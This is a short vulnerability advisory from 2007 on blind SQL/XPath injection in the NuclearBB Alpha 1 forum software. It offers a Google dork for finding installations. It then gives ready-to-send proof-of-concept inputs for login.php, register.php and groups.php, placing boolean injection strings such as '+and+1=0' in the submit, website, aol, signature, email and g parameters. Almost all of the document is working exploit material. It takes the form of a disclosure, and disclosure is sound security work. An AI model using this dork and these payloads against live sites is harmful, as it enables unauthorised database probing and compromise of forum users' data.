| 
 | 
NuclearBB Alpha 1 - Multiple Blind SQL/XPath Injection Vulnerabilities
Vulnerable: NuclearBB Alpha 1
Google d0rk: "This forum is powered by NuclearBB"
============String Inputs
============
----------------------------
login.php - $_POST['submit']
----------------------------
username=xyz
password=passxyz
submit=Login"+and+"1"="0
--------------------------------
register.php - $_POST['website']
--------------------------------
username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=passwordxyz
pass2=passwordxyz
website=xyz@xyz.com"+and+"1"="0 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over
register_submit=Register
----------------------------
register.php - $_POST['aol']
----------------------------
username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com"+and+"1"="0 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over
register_submit=Register
----------------------------------
register.php - $_POST['signature']
----------------------------------
username=xyz@xyz.com 
email=xyz@xyz.com 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com"+and+"1"="0 
coppa_state=over
register_submit=Register
=============Numeric Inputs
=============
-----------------------
groups.php - $_GET['g']
-----------------------
http://www.example.com/groups.php?g=1+and+1=0 
------------------------------
register.php - $_POST['email']
------------------------------
username=xyz@xyz.com 
email=xyz@xyz.com+and+1=0 
pass1=xyz@xyz.com 
pass2=xyz@xyz.com 
website=xyz@xyz.com 
location=xyz@xyz.com 
msn=xyz@xyz.com 
yahoo=xyz@xyz.com 
aol=xyz@xyz.com 
icq=xyz@xyz.com 
signature=xyz@xyz.com 
coppa_state=over®ister_submit=Register
John Martinelli
john@martinelli.com 
http://john-martinelli.com 
April 18th, 2007